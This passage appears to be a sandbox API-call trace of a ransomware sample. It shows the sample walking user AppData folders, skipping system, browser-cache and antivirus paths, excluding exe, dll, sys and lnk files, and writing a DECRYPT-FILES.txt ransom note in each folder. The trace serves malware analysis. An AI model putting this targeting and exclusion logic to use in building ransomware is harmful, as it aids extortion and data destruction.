HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="Dictionaries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Program Files") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch=":\\Windows") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Games\\") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.925] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\All Users") returned 0x0 [0076.926] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.926] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.926] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.926] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="AhnLab") returned 0x0 [0076.926] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.926] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0076.926] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.926] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\jkbimi8.tmp") returned 89 [0076.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0076.926] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0076.926] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.926] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\DECRYPT-FILES.txt") returned 95 [0076.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0076.926] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0076.927] CloseHandle (hObject=0x454) returned 1 [0076.928] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0076.928] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*" [0076.928] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0076.928] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.928] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.928] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.928] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.928] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.928] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.928] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.928] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.928] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.928] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.928] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.928] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.929] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned 77 [0076.929] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.929] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\" [0076.929] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\jkbimi8.tmp" [0076.929] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.929] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\Dictionaries\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.929] CloseHandle (hObject=0x0) returned 0 [0076.929] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.929] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.929] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0076.929] CloseHandle (hObject=0x450) returned 1 [0076.930] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.930] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.930] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.930] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.930] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.930] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.930] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.930] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned 64 [0076.930] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.930] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\" [0076.930] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\jkbimi8.tmp" [0076.930] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Linguistics\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\linguistics\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.930] CloseHandle (hObject=0x0) returned 0 [0076.930] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.931] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.931] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0076.931] CloseHandle (hObject=0x448) returned 1 [0076.931] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0076.931] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0076.931] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0076.931] lstrcatW (in: lpString1="LogTransport2", lpString2="\\" | out: lpString1="LogTransport2\\") returned="LogTransport2\\" [0076.931] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpString2="LogTransport2\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Program Files") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch=":\\Windows") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Games\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\All Users") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="AhnLab") returned 0x0 [0076.931] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.931] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0076.932] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.932] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\jkbimi8.tmp") returned 78 [0076.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0076.932] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0076.932] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.932] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\DECRYPT-FILES.txt") returned 84 [0076.932] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0076.932] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0076.933] CloseHandle (hObject=0x44c) returned 1 [0076.933] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0076.933] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*" [0076.933] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0076.934] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.934] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.934] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.934] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.934] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.934] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa0ec7e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa0ec7e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa0ec7e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.934] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.934] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.934] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.934] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.934] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.934] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.934] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned 66 [0076.934] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.934] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\") returned="C:\\Users\\5p5NrGJn0jS 